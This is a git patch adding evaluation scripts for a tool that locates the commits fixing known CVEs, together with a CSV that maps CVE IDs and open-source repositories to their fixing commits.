print(dataset_path) + dataset_path = "empirical_study/datasets/" + dataset_path + ".csv" + dataset = load_dataset(dataset_path) + rules = {} + table = {} + count = 0 + for itm in dataset: + try: + r, i, v, id = check_report_get_rules(dataset_path[:-4], itm[0], itm[4]) + if r is not None: + count += 1 + table[itm[0]] = [id, v, r, itm] + for rule in r: + if rule not in rules: + rules[rule] = 1 + rules[rule] += 1 + except FileNotFoundError: + continue + + ordered = dict(sorted(rules.items())) + for k, v in ordered.items(): + print(f"{k} & {v} & {(v / count)*100:.2f}\\% \\\\") + + plt.rcParams["figure.autolayout"] = True + sns.set_style("whitegrid") + colors = [ + ( + "#0063B2FF" + if id + in ( + "COMMIT_IN_REFERENCE", + "CROSS_REFERENCED_GH_LINK", + "CVE_ID_IN_LINKED_ISSUE", + "CVE_ID_IN_MESSAGE", + ) + else "#9CC3D5FF" + ) + for id in ordered.keys() + ] + ss = sns.barplot( + y=list(ordered.keys()), + x=list(ordered.values()), + palette=colors, + ) + ss.set_xscale("log", base=2) + ss.set_xticks([2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]) + ss.set_xticklabels([2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]) + + # ss.set_xticks(range(0, 800, 100)) + ss.tick_params(axis="y", labelsize=8) + plt.show() + print(count) + for k, v in table.items(): + if "CVE_ID_IN_LINKED_ISSUE" in v[2]: + print(f"{v[3][0]};{v[3][1]};{v[3][2]};{v[3][3]};{v[3][4]};{v[3][5]}") + # print(f"{k}: {v[3]}/commit/{v[0]}") + + +def build_table_row(matched_rules): + rules_list = [ + "COMMIT_IN_REFERENCE", + "CVE_ID_IN_MESSAGE", + "CVE_ID_IN_LINKED_ISSUE", + "CROSS_REFERENCED_JIRA_LINK", + "CROSS_REFERENCED_GH_LINK", + "CHANGES_RELEVANT_FILES", + "CHANGES_RELEVANT_CODE", + "RELEVANT_WORDS_IN_MESSAGE", + "ADV_KEYWORDS_IN_FILES", + "ADV_KEYWORDS_IN_MSG", + "SEC_KEYWORDS_IN_MESSAGE", + "SEC_KEYWORDS_IN_LINKED_GH", + "SEC_KEYWORDS_IN_LINKED_JIRA", + "GITHUB_ISSUE_IN_MESSAGE", + "JIRA_ISSUE_IN_MESSAGE", + "COMMIT_HAS_TWINS", + ] + out = [] + for id in rules_list: + if id in matched_rules: + out.append("\checkmark") + else: + out.append("") + return out + + +def analyze_prospector(filename: str): # noqa: C901 + # delete_missing_git(dataset_path) + # return [] + filename = "empirical_study/datasets/" + filename + ".csv" + dataset = load_dataset(filename) + # res_ts = temp_load_reservation_dates(dataset_path[:-4] + "_timestamps.csv") + + missing = [] + skipped = 0 + timestamps = { + "COMMIT_IN_REFERENCE": list(), + "CVE_ID_IN_MESSAGE": list(), + "CVE_ID_IN_LINKED_ISSUE": list(), + "CROSS_REFERENCE": list(), + "medium_confidence": list(), + "low_confidence": list(), + } + yearly_timestamps = {} + results = { + "COMMIT_IN_REFERENCE": set(), + "CVE_ID_IN_MESSAGE": set(), + "CVE_ID_IN_LINKED_ISSUE": set(), + "CROSS_REFERENCE": set(), + "medium_confidence": set(), + "low_confidence": set(), + "not_found": set(), + "not_reported": set(), + "false_positive": set(), + "real_false_positive": set(), + } + rulescount = defaultdict(lambda: 0) + references = list() + + for itm in dataset: + try: + ( + is_fix, + has_certainty, + commit_id, + exists, + position, + ranks, + rules, + ) = check_report( + filename[:-4], itm[0], itm[4] + ) # ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS + except FileNotFoundError: + continue + + year = itm[0].split("-")[1] + # if is_fix and timestamp is not None: + # res_timestamp = get_reservation_date(itm[0]) + # if res_timestamp is not None: + # ts = timestamp - res_timestamp + # # if int(ts / 86400) > -900: + # year = itm[0].split("-")[1] + # if year not in timestamps: + # timestamps[year] = [] + # timestamps[year].append(int(ts / 86400)) + # # ts_analsis.append(int(ts / 86400)) + # else: + # print(f"Missing reservation date for {itm[0]}") + # time.sleep(0.05) + # if timestamp: + + # # adv_ts = res_ts.get(itm[0]) + # timestamp = adv_ts - timestamp + # yearly_timestamps.setdefault(year, list()) + # yearly_timestamps[year].append(int(timestamp / 86400)) + # timestamp = abs(timestamp) + + # if is_fix and position < 10: + # rules, _, _, _ = check_report_get_rules(filename[:-4], itm[0], itm[4]) + # print(itm[0], rules) + # else: + # continue + # rules, _, _, _ = check_report_get_rules(filename[:-4], itm[0], itm[4]) + # for rule in rules: + # rulescount[rule] += 1 + # continue + if is_fix and has_certainty: # and 0 <= position < 10: + print( + itm[0], + "&", + " & ".join(build_table_row(rules)), + "&", + " & ".join([str(x) for x in ranks]).replace("-1", ""), + "\\\\ \\midrule", + ) + results[has_certainty].add(itm[0]) + # if "COMMIT_IN_REFERENCE" in has_certainty and all( + # rule != "COMMIT_IN_REFERENCE" + # for rule in has_certainty + # if rule != "COMMIT_IN_REFERENCE" + # ): + # with open("only_commit_in_reference2.csv", "a", newline="") as file: + # writer = csv.writer(file) + # writer.writerow( + # [f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}"] + # ) + # elif all(rule != "COMMIT_IN_REFERENCE" for rule in has_certainty): + # with open("only_other_strong_rules.csv", "a", newline="") as file: + # writer = csv.writer(file) + # writer.writerow( + # [f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}"] + # ) + for rule in rules: + rulescount[rule] += 1 + # print(f"{filename[:-4]}/{itm[0]}.json") + # print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}") + # print(f"{filename[:-4]}/{itm[0]}.json") + # timestamps["false_positive"].append(timestamp) + # elif is_fix and has_certainty and position > 0: + # results["real_false_positive"].add(itm[0]) + # if int(timestamp / 86400) < 731: + # timestamps[has_certainty].append(int(timestamp / 86400)) + elif is_fix and not has_certainty and position == 0: + print( + itm[0], + "&", + " & ".join(build_table_row(rules)), + "&", + " & ".join([str(x) for x in ranks]).replace("-1", ""), + "\\\\ \\midrule", + ) + results["medium_confidence"].add(itm[0]) + for rule in rules: + rulescount[rule] += 1 + # print(itm[0] + " - " + str(position + 1)) + + # if int(timestamp / 86400) < 731: + # timestamps["medium_confidence"].append(int(timestamp / 86400)) + elif is_fix and not has_certainty and 0 < position < 10: + results["low_confidence"].add(itm[0]) + print( + itm[0], + "&", + " & ".join(build_table_row(rules)), + "&", + " & ".join([str(x) for x in ranks]).replace("-1", ""), + "\\\\ \\midrule", + ) + for rule in rules: + rulescount[rule] += 1 + # print(itm[0] + " - " + str(position + 1)) + # print( + # f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]} pos:{position}" + # ) + # if int(timestamp / 86400) < 731: + # timestamps["low_confidence"].append(int(timestamp / 86400)) + # print(itm[0], position + 1) + elif is_fix and not has_certainty and position >= 10: + results["not_found"].add(itm[0]) + for rule in rules: + rulescount[rule] += 1 + # timestamps["not_found"].append(int(timestamp / 86400)) + # print(itm[0], position + 1) + # print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}") + elif not is_fix and has_certainty: + results["false_positive"].add(itm[0]) + with open("false_postive", "a") as file: + writer = csv.writer(file) + writer.writerow( + [f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}"] + ) + print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}") + elif not is_fix and not has_certainty and commit_id and position < 0: + results["not_reported"].add(itm[0]) + print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}") + elif not is_fix and not exists and position < 0: + skipped += 1 + # print( + # ",".join( + # results["not_reported"] + # | results["not_found"] + # | results["false_positive"] + # | results["low_confidence"] + # | results["medium_confidence"] + # | results["CVE_ID_IN_LINKED_ISSUE"] + # | results["CROSS_REFERENCE"] + # | results["CVE_ID_IN_MESSAGE"] + # ) + # ) + total = len(dataset) - skipped + rulescount = dict(sorted(rulescount.items())) + + plt.rcParams["figure.autolayout"] = True + plt.rcParams["savefig.dpi"] = 300 + sns.set_style("whitegrid") + colors = [ + ( + "#ffa600" + if id + in ( + "COMMIT_IN_REFERENCE", + "CROSS_REFERENCED_GH_LINK", + "CROSS_REFERENCED_JIRA_LINK", + "CVE_ID_IN_LINKED_ISSUE", + "CVE_ID_IN_MESSAGE", + ) + else "#003f5c" + ) + for id in rulescount.keys() + ] + ss = sns.barplot( + x=list(rulescount.keys()), + y=list(rulescount.values()), + palette=colors, + width=0.6, + ) + plt.xticks(rotation="vertical") + # ss.set_xscale("log", base=2) + # ss.set_xticks([2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]) + # ss.set_xticklabels([2, 4, 8, 16, 32, 64, 128, 256, 512, 1024], rot) + + # ss.set_xticks(range(0, 800, 100)) + ss.tick_params(axis="x", labelsize=8) + # plt.show() + plt.savefig("project-kb.png") + + for rule, count in rulescount.items(): + print(f"{rule}: {count}") + # missing_lookup_git(missing) + + # print(YEAR) + print() + total_check = sum([len(x) for x in results.values()]) + print(total_check) + # total_year = sum([len([x for x in y if YEAR in x]) for y in results.values()]) + for key, value in results.items(): + print(f"{key}: {len(value)} ({(len(value)/1315)*100:.2f}%)") + # print( + # f"{key}: {(len([x for x in value if YEAR in x]) / total_year) * 100:.2f}%" + # ) + + # total_check += len(value) + yearly_timestamps = {k: v for k, v in yearly_timestamps.items() if len(v) > 30} + # df = pd.DataFrame(dict([(k, pd.Series(v)) for k, v in timestamps.items()])) + + # ax = sns.violinplot(df, inner="box") + # plt.ylabel("Days") + # plt.show() + + # for key, value in timestamps.items(): + # print( + # f"{key}: mean={int(statistics.mean(value))} stdDev={int(statistics.stdev(value))}" + # ) + + # df = pd.DataFrame.from_dict(timestamps, orient="index") + + # sns.set(style="whitegrid") + # sns.violinplot(data=df) + + if total_check != total: + print("ERROR: Some CVEs are missing") + + return missing + + +def delete_missing_git(dataset_path): + dataset = load_dataset(dataset_path) + for itm in dataset[:500]: + repository = Git(itm[1], "/sapmnt/home/I586140/intern/gitcache") + existing = [] + for commit in itm[4].split(","): + raw = repository.get_commit(commit) + try: + raw.extract_timestamp() + existing.append(commit) + except Exception: + pass + if len(itm[4].split(",")) != len(existing): + if len(existing) > 0: + print( + f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{','.join(existing)};{itm[5]}" + ) + else: + print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}") + + +def missing_lookup_git(missing: List[str]): + count = 0 + for itm in missing: + cve, repo, versions, _, commits, _ = itm.split(";") + repository = Git(repo, "/sapmnt/home/I586140/intern/gitcache") + # repository.clone() + + repo_tags_o = repository.get_tags() + repo_tags = get_possible_tags(repo_tags_o, versions) + if repo_tags[0] is None and repo_tags[1] is None: + continue + versions = versions.split(":") + print(f"{cve}") + + print(f"Vers: {versions}") + print(f"Tags: {repo_tags}") + existing = [] + flag = False + for commit in commits.split(","): + raw_commit = repository.get_commit(commit) + if raw_commit.exists(): + existing.append(commit) + + # if len(commits.split(",")) != len(existing): + # if len(existing) > 0: + # print(f"{cve};{repo};{versions};False;{','.join(existing)};") + # else: + # pass + # count += 1 + + try: + raw_commit.tags = raw_commit.find_tags() + + if repo_tags[0] in raw_commit.tags: + print( + repo + "/commit/" + raw_commit.id, + " - ", + "Vulnerable tag is fixed", + ) + elif ( + repo_tags[1] in raw_commit.tags + and repo_tags[0] not in raw_commit.tags + ): + commit_ts = raw_commit.get_timestamp() + next_tag_ts = repository.get_timestamp(repo_tags[1], "a") + prev_tag_ts = repository.get_timestamp(repo_tags[0], "a") + if prev_tag_ts < commit_ts < next_tag_ts: + print(repo + "/commit/" + raw_commit.id, " - ", "Weird") + print( + f"python client/cli/main.py {cve} --repository {repo} --version-interval {repo_tags[0]}:{repo_tags[1]}" + ) + else: + print("Commit timestamp is outside the time interval") + elif repo_tags[1] not in raw_commit.tags: + if not flag: + print("simola") + flag = True + print(repo + "/commit/" + raw_commit.id) + ttags = [t for t in raw_commit.tags if repo_tags[1][:3] == t[:3]] + print(ttags) + if raw_commit.tags == []: + print(repo + "/commit/" + raw_commit.id, " - ", "No tags") + except Exception: + print(repo + "/commit/" + raw_commit.id, " - ", "Commit not found") + + print("=====================================") + # print(f"Mismatch: {count}/{len(missing)}") + + +def sum_relevances(list_of_rules): + return sum([r["relevance"] for r in list_of_rules]) + + +def check_report_get_rules(dataset, cve, fixing_commits): + with open(f"{dataset}/{cve}.json", "r") as file: + data = json.load(file) + # not_fixing = [ + # commit + # for commit in data["commits"] + # if commit["commit_id"] not in fixing_commits + # ] + # if len(not_fixing) == 0: + # return [], 0, 0, 0 + # return ( + # [r["id"] for r in not_fixing[0]["matched_rules"]], + # 1, + # 1, + # not_fixing[0]["commit_id"], + # ) + for i, commit in enumerate(data["commits"]): + if commit["commit_id"] in fixing_commits: + return ( + [r["id"] for r in commit["matched_rules"]], + i + 1, + sum_relevances(commit["matched_rules"]), + commit["commit_id"], + ) + + if "twins" in commit: + for twin in commit["twins"]: + if twin[1] in fixing_commits: + return ( + [r["id"] for r in commit["matched_rules"]], + i + 1, + sum_relevances(commit["matched_rules"]), + commit["commit_id"], + ) + # return ( + # [r["id"] for r in commit["matched_rules"]], + # i + 1, + # sum_relevances(commit["matched_rules"]), + # commit["commit_id"], + # ) + return None, None, None, None + + +def check_report(dataset, cve, fixing_commits): + try: + with open(f"{dataset}/{cve}.json", "r") as file: + data = json.load(file) + adv_timestamp = int(data["advisory_record"]["published_timestamp"]) + # for i in data["advisory_record"]["references"]: + # if "commit::" not in i: + # print(i) + # adv_timestamp = get_reservation_date(cve) + if len(data["commits"]) == 0: + score_first = -1 + else: + score_first = sum_relevances(data["commits"][0]["matched_rules"]) + for index, commit in enumerate(data["commits"]): + score_next = -1 + if index > 0: + score_next = sum_relevances( + data["commits"][index - 1]["matched_rules"] + ) + if commit["commit_id"] in fixing_commits: + if index == 0: + score_first = -1 + + return ( + True, + has_certainty(commit["matched_rules"]), + commit["commit_id"], + True, + index, + [ + index + 1, + sum_relevances(commit["matched_rules"]), + score_first, + score_next, + ], + [r["id"] for r in commit["matched_rules"]], + ) + + if "twins" in commit: + for twin in commit["twins"]: + if twin[1] in fixing_commits: + if index == 0: + score_first = -1 + return ( + True, + has_certainty(commit["matched_rules"]), + commit["commit_id"], + True, + index, + [ + index + 1, + sum_relevances(commit["matched_rules"]), + score_first, + score_next, + ], + [r["id"] for r in commit["matched_rules"]], + ) + + for index, commit in enumerate(data["commits"]): + cert = has_certainty(commit["matched_rules"]) + if cert != 0: + return ( + False, + cert, + commit["commit_id"], + True, + index, + [ + sum_relevances(commit["matched_rules"]), + score_first, + -1, + ], + [r["id"] for r in commit["matched_rules"]], + ) + return ( + False, + 0, + True, + True, + -1, + None, + [], + ) + except FileNotFoundError: + # is_fix, has_certainty, commit_id, exists, index + return False, 0, None, False, -1, None, [] + + +def process_json_report(dataset, cve, commits): + out = [] + exists = True + try: + with open(f"{dataset}/{cve}/{cve}.json", "r") as file: + data = json.load(file) + processed_commits = {} + for i, commit in enumerate(data["commits"]): + processed_commits[commit["commit_id"]] = [ + sum_relevances(commit["matched_rules"]), + i + 1, + ] + if commit["commit_id"] in commits: + processed_commits.pop(commit["commit_id"]) + current = [ + cve, + i + 1, + sum_relevances(commit["matched_rules"]), + None, + None, + None, + ] + current[3] = len( + [k for k, v in processed_commits.items() if v[0] == current[2]] + ) + if i > 0: + current[4] = sum_relevances(data["commits"][0]["matched_rules"]) + r_next = 0 + for j in range(i, -1, -1): + r_next = sum_relevances(data["commits"][j]["matched_rules"]) + if r_next > current[2]: + current[5] = r_next + break + out = current + exists = True + break + except FileNotFoundError: + exists = False + return exists, out + + +def analyze_rules_usage(dataset_path: str, cve: str = ""): + dataset = load_dataset(dataset_path) + rules: Dict[str, int] = {} + commit_count = 0 + cve_count = 0 + for itm in dataset: + cve_count += 1 + with open(f"{dataset_path[:-4]}/{itm[0]}/{itm[0]}.json", "r") as file: + data = json.load(file) + for commit in data["commits"]: + commit_count += 1 + for rule in commit["matched_rules"]: + if rule["id"] in rules: + rules[rule["id"]] += 1 + else: + rules[rule["id"]] = 1 + + sorted_rules = { + k: v for k, v in sorted(rules.items(), key=lambda item: item[1], reverse=True) + } + print(f"\nTotal commits: {commit_count}") + print(f"Total cves: {cve_count}\n") + for k, v in sorted_rules.items(): + print(f"{k}: {v}") + + +def update_comparison_table(dataset): + data = load_dataset(dataset) + pass + + +def to_latex_table(): + data = load_dataset("results/scalco.csv") + for e in data: + print(f"{e[0]} & {e[1][19:]} & {e[5]} \\\\ \hline") + + +def is_real_version(text: str): + return bool(re.match(r"\d+\.(?:\d+\.*)*\d", text)) + + +VULN = ["version", "through", "versions"] + +FIXED = [ + "before", + "before release", + "before version", + "prior to", + "upgrade to", + "fixed in", + "fixed in version", + "fixed in release", + "to version", +] + + +def get_version_spacy(text: str, nlp): + doc = nlp(text) + relevant_sentences = {} + relevant_sentence = "" + fixed_version = "" + vulnerable_version = "" + for i in range(len(doc))[1:]: + if is_real_version(doc[i].text): + if doc[i - 1].text in FIXED: + relevant_sentence = doc[: i + 1] + fixed_version = doc[i].text + elif (doc[i - 2].text + " " + doc[i - 1].text) in FIXED: + relevant_sentence = doc[: i + 1] + fixed_version = doc[i].text + elif ( + doc[i - 3].text + " " + doc[i - 2].text + " " + doc[i - 1].text + ) in FIXED: + relevant_sentence = doc[: i + 1] + fixed_version = doc[i].text + else: + relevant_sentence = doc[: i + 1] + vulnerable_version = doc[i].text + return vulnerable_version, fixed_version + + +def check_advisory(cve, repository=None, nlp=None): + advisory = build_advisory_record( + cve, nvd_rest_endpoint="http://localhost:8000/nvd/vulnerabilities/" + ) + references = [urlparse(r).netloc for r in advisory.references] + return references + vuln = "None" + if len(advisory.versions.get("affected")): + vuln = advisory.versions.get("affected")[-1] + + fixed = "None" + if len(advisory.versions.get("fixed")): + fixed = advisory.versions.get("fixed")[-1] + + vuln2, fixed2 = get_version_spacy(advisory.description, nlp) + res = [advisory.cve_id, advisory.description] + if fixed == fixed2 and vuln == vuln2: + res.append(f"{vuln}:{fixed}") + if fixed == "None" and fixed2 != "": + res.append(f"{vuln}:{fixed2}") + if vuln == "None" and vuln2 != "": + res.append(f"{vuln2}:{fixed}") + if fixed != fixed2 and fixed2 != "" and fixed != "None": + res.append(f"{vuln}:{fixed}") + res.append(f"{vuln}:{fixed2}") + + if len(res) > 2: + res.append("***************************************") + print(advisory.cve_id) + return res + else: + res.append(f"{vuln}:{fixed}") + res.append("***************************************") + print(advisory.cve_id) + return res + + +def parse_cli_args(args): + parser = argparse.ArgumentParser(description="Prospector scripts") + + parser.add_argument( + "-i", + "--input", + type=str, + help="Input file", + ) + + parser.add_argument( + "-e", + "--execute", + action="store_true", + help="Input file", + ) + + parser.add_argument( + "-a", + "--analyze", + action="store_true", + help="Input file", + ) + + parser.add_argument( + "-o", + "--output", + type=str, + help="Output file", + ) + + parser.add_argument( + "-r", + "--rules", + action="store_true", + help="Rules analysis option", + ) + + parser.add_argument( + "-f", + "--folder", + type=str, + help="Folder to analyze", + ) + + parser.add_argument( + "-c", + "--cve", + type=str, + default="", + help="CVE to analyze", + ) + + parser.add_argument( + "-p", + "--parallel", + help="Run in parallel on multiple CVEs", + action="store_true", + ) + return parser.parse_args() + + +def main(argv): + args = parse_cli_args(argv) + if args.execute and not args.analyze and not args.parallel: + # get_full_commit_ids(args.input) + # return + execute_prospector(args.input, args.cve) + elif args.execute and not args.analyze and args.parallel: + while not parallel_execution(args.input): + pass + # parallel_execution(args.input) + elif args.analyze and not args.rules and not args.execute: + analyze_prospector(args.input) + elif args.analyze and args.rules and not args.execute: + analyze_results_rules(args.input) + elif args.analyze and args.execute: + sys.exit("Choose either to execute or analyze") + + +def mute(): + sys.stdout = open(os.devnull, "w") + + +def parallel_execution(filename: str): + print("Executing in parallel") + print(os.getcwd()) + dataset = load_dataset("empirical_study/datasets/" + filename + ".csv") + inputs = [ + { + "vulnerability_id": cve[0], + "repository_url": cve[1], + "version_interval": cve[2], + "git_cache": "/sapmnt/home/I586140/intern/gitcache", + "limit_candidates": 2500, + "filename": filename, + "silent": True, + } + for cve in dataset + if not os.path.exists(f"empirical_study/datasets/{filename}/{cve[0]}.json") + ] + if len(inputs) == 0: + return True + try: + pool = multiprocessing.Pool(processes=4) + for _ in tqdm( + pool.imap_unordered(execute_prospector_wrapper, inputs), + total=len(inputs), + ): + pass + pool.close() + return True + except Exception: + pool.terminate() + return False + + +def execute_prospector_wrapper(kwargs): + filename = kwargs["filename"] + del kwargs["filename"] + r, a = prospector(**kwargs) + if r is not None: + generate_report(r, a, "json", f"empirical_study/datasets/{filename}/{a.cve_id}") + + +def execute_prospector(filename: str, cve: str = ""): + dataset = load_dataset("empirical_study/datasets/" + filename + ".csv") + if len(cve) != 0: + dataset = [c for c in dataset if c[0] in cve] + + for cve in dataset: + if os.path.exists(f"empirical_study/datasets/{filename}/{cve[0]}.json"): + continue + print( + f"\n\n*********\n {cve[0]} ({dataset.index(cve)+1}/{len(dataset)})\n**********\n" + ) + start_time = time.time() + result, advisory = prospector( + vulnerability_id=cve[0], + repository_url=cve[1], + version_interval=cve[2], + git_cache="/sapmnt/home/I586140/intern/gitcache", + # git_cache="/users/sach/gitcache", + limit_candidates=2000, + ) + + if result is not None and time.time() - start_time < 1900: + # result = result[:10] + # for r in result: + # r.relevance = 0 + # r.matched_rules = [] + # advisory.files = [] + # advisory.keywords = [] + # result.sort(key=lambda x: x.timestamp, reverse=False) + generate_report( + result, + advisory, + "json", + f"empirical_study/datasets/{filename}/{cve[0]}", + ) + + +def list_dir_and_select_folder(): + files = [file for file in os.listdir("datasets/") if "." not in file] + for i, file in enumerate(files): + print(i, ")", file) + choice = int(input("Choose a dataset: ")) + return files[choice] + + +def list_dir_and_select_dataset(): + files = [file for file in os.listdir("datasets/") if file.endswith(".csv")] + for i, file in enumerate(files): + print(i, ")", file) + choice = int(input("Choose a dataset: ")) + return files[choice] + + +# this method handls ctrl+c from the keyboard to stop execution +def sig_handler(signum, frame): + print("You pressed Ctrl+C!") + sys.exit(0) + + +if __name__ == "__main__": + signal.signal(signal.SIGINT, sig_handler) + main(sys.argv[1:]) From b2c6690646d3286b9cc8b7bfc3773c6843716ce5 Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 11 Jul 2024 15:24:02 +0000 Subject: [PATCH 025/130] script runs --- .../starting_datasets/steady_dataset.csv | 841 ++++++++++++++++++ prospector/evaluation/run_multiple.py | 7 +- 2 files changed, 845 insertions(+), 3 deletions(-) create mode 100644 prospector/evaluation/data/steady_dataset/starting_datasets/steady_dataset.csv diff --git a/prospector/evaluation/data/steady_dataset/starting_datasets/steady_dataset.csv b/prospector/evaluation/data/steady_dataset/starting_datasets/steady_dataset.csv new file mode 100644 index 000000000..b8582954d --- /dev/null +++ b/prospector/evaluation/data/steady_dataset/starting_datasets/steady_dataset.csv @@ -0,0 +1,841 @@ +ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS +CVE-2018-11797;https://github.com/apache/pdfbox;None:None;False;0e14d6a42cc965e23bb1b40f04b4c002dc173b88; +CVE-2020-9484;https://github.com/apache/tomcat;None:None;False;3aa8f28db7efb311cdd1b6fe15a9cd3b167a222,53e30390943c18fca0c9e57dbcc14f1c623cfd0,bb33048e3f9b4f2b70e4da2e6c4e34ca89023b1,ec08af18d0f9ddca3f2d800ef66fe7fd20afef2; +CVE-2021-21274;https://github.com/matrix-org/synapse;None:None;False;ff5c4da1289cb5e097902b3e55b771be342c29d6; +CVE-2017-4973;https://github.com/cloudfoundry/uaa;None:None;False;24bc5ade80560cedb9300940d2b398163ab0dc6; +CVE-2017-4991;https://github.com/cloudfoundry/uaa;None:None;False;7db5e5846961e08295b1ef7af909f267eebe5da,eb3f86054489039e11eabd54a8ec9a46c22abfc; +CVE-2017-16615;https://github.com/thanethomson/MLAlchemy;None:None;False;bc795757febdcce430d89f9d08f75c32d6989d3c; +CVE-2018-7537;https://github.com/django/django;None:None;False;a91436360b79a6ff995c3e5018bcc666dfaf153; +CVE-2019-10310;https://github.com/jenkinsci/ansible-tower-plugin;None:None;False;b63a047281c2389217c9404f2f4bd4c9e66364fe; +CVE-2016-6581;https://github.com/python-hyper/hpack;None:None;False;4529c1632a356cc1ab6a7fdddccd2de60a21e366; +CVE-2018-1000008;https://github.com/jenkinsci/pmd-plugin;None:None;False;f88399a021c22e30cb8fbac5200471d69f1b6224; +CVE-2021-20178;https://github.com/ansible/ansible;None:None;False;0785772a03470fd2879d2f613520284997dc9dd0; +CVE-2019-1010083;https://github.com/pallets/flask;None:None;False;465b48ed4e4af52493df1febe4687f53032a5e0a; +CVE-2014-7810;https://github.com/apache/tomcat80;None:None;False;ab4ed90487795c9d9e2f9c63f9e1520e90a77104; +CVE-2019-1003049;https://github.com/jenkinsci/jenkins;None:None;False;0eeaa087aac192fb39f52928be5a5bbf16627ea6; +CVE-2019-3828;https://github.com/sivel/ansible;None:None;False;4be3215d2f9f84ca283895879f0c6ce1ed7dd33; +CVE-2020-15720;https://github.com/dogtagpki/pki;None:None;False;50c23ec146ee9abf28c9de87a5f7787d495f0b72; +CVE-2016-6637;https://github.com/cloudfoundry/uaa;None:None;False;32569285018a464dcbd9d4c120a11cc4b767f8e; +CVE-2019-18933;https://github.com/zulip/zulip;None:None;False;0c2cc41d2e40807baa5ee2c72987ebfb64ea2eb6; +CVE-2018-1000125;https://github.com/inversoft/prime-jwt;None:None;False;0d94dcef0133d699f21d217e922564adbb83a227; +CVE-2015-5211;https://github.com/spring-projects/spring-framework.git;None:None;False;a95c3d820dbc4c3ae752f1b3ee22ee860b162402; +DJOSER-001;https://github.com/sunscrapers/djoser;None:None;False;73b84926d9566df12d48245b06c5d5c986bbb272; +CVE-2020-7471;https://github.com/django/django;None:None;False;001b0634cd309e372edb6d7d95d083d02b8e37b,505826b469b16ab36693360da9e11fd13213421,c67a368c16e4680b324b4f385398d638db4d814,eb31d845323618d688ad429479c6dda97305613; +CVE-2020-13940;https://github.com/apache/nifi;None:None;False;7f0416ee8bdcee95e28409cc6fae9c1394c2a798; +CVE-2014-9601;https://github.com/wiredfool/Pillow;None:None;False;0b75526ffe41a4697231beb8b5740617c98f290b,44286ba3c9bfa6ed565d11bd61460d8ec215e1ea; +NIFI-4436;https://github.com/apache/nifi;None:None;False;0127b02617530491a1a55aa72395cee583083956,b6117743d4c1c1a37a16ba746b9edbbdd276d69f; +CVE-2014-1938;https://github.com/alex/rply;None:None;False;76d268a38c627bf4aebebcd064f5b6d380eb8b20; +CVE-2021-26296;https://github.com/apache/myfaces;None:None;False;b1b3d5486af4f9a4fa89ea433a5476bde8f92b1f; +CVE-2018-1000865;https://github.com/jenkinsci/groovy-sandbox;None:None;False;0cd7ec12b7c56cfa3167d99c5f43147ce05449d3; +CVE-2020-4071;https://github.com/tm-kn/django-basic-auth-ip-whitelist;None:None;False;106237b3736981a9d10fd9c8859a1bd46117e822; +CVE-2019-6802;https://github.com/pypiserver/pypiserver;None:None;False;1375a67c55a9b8d4619df30d2a1c0b239d7357e6; +CVE-2015-0250;https://github.com/apache/batik;None:None;False;efebce3f0ad33ede916a148b84d75749aea38349; +MTPROTOPROXY-001;https://github.com/alexbers/mtprotoproxy;None:None;False;372861ac6e3dd3d1d4996282f0905c36c5163fba; +CVE-2019-9658;https://github.com/checkstyle/checkstyle;None:None;False;180b4fe37a2249d4489d584505f2b7b3ab162ec6; +CVE-2020-5428;https://github.com/spring-cloud/spring-cloud-task;None:None;False;704b8df2ada20c349d5919d1dd5ee5bade4b96e8; +PYTHON3-SAML-001;https://github.com/onelogin/python3-saml;None:None;False;61eacb44d5789bd96edd11309a2bcae66e0d725f; +CVE-2018-1000656;https://github.com/pallets/flask;None:None;False;ab4142215d836b0298fc47fa1e4b75408b9c37a0; +CVE-2019-1003031;https://github.com/jenkinsci/matrix-project-plugin;None:None;False;765fc39694b31f8dd6e3d27cf51d1708b5df2be7; +CVE-2019-10449;https://github.com/jenkinsci/fortify-on-demand-uploader-plugin;None:None;False;b0ad5e4e8fc49361e73d4974ef77024bba00be5d; +CVE-2020-25689;https://github.com/wildfly/wildfly-core;None:None;False;5a8a65c2e3310fe0c0143581c677855516148215; +CVE-2014-1858;https://github.com/numpy/numpy;None:None;False;0bb46c1448b0d3f5453d5182a17ea7ac5854ee15; +CVE-2019-17206;https://github.com/frostming/rediswrapper;None:None;False;2751f6ff86e3f90c9e14b8b8acc8ef02c86987e1; +CVE-2018-16165;https://github.com/JPCERTCC/LogonTracer;None:None;False;2bb79861dbaf7e8a9646fcd70359523fdb464d9c; +CVE-2018-8013;https://github.com/apache/batik;None:None;False;f91125b26a6ca2b7a1195f1842360bed03629839; +CVE-2019-12300;https://github.com/buildbot/buildbot;None:None;False;51339c9e29850094d8b213d9a6eb4bee8e02563; +CVE-2017-4974;https://github.com/cloudfoundry/uaa;None:None;False;5dc5ca9176ed5baa870680d99f37e7e559dddc5; +HADOOP-12001;https://github.com/apache/hadoop;None:None;False;98f9d6fee112d95aab680fc7f27b815b2e698a5; +CVE-2018-1000164;https://github.com/benoitc/gunicorn;None:None;False;1e10a02e73c87dfadc394b361af33864d0e59e24; +CVE-2020-35460;https://github.com/joniles/mpxj;None:None;False;8eaf4225048ea5ba7e59ef4556dab2098fcc4a1d; +CVE-2017-12614;https://github.com/apache/incubator-airflow;None:None;False;8f9bf94d82abc59336e642db64e575cee0cc5df0; +CVE-2017-1000503;https://github.com/jenkinsci/jenkins;None:None;False;9b39411b1ae07ce8bf6c7df457bde1c6dabba9f; 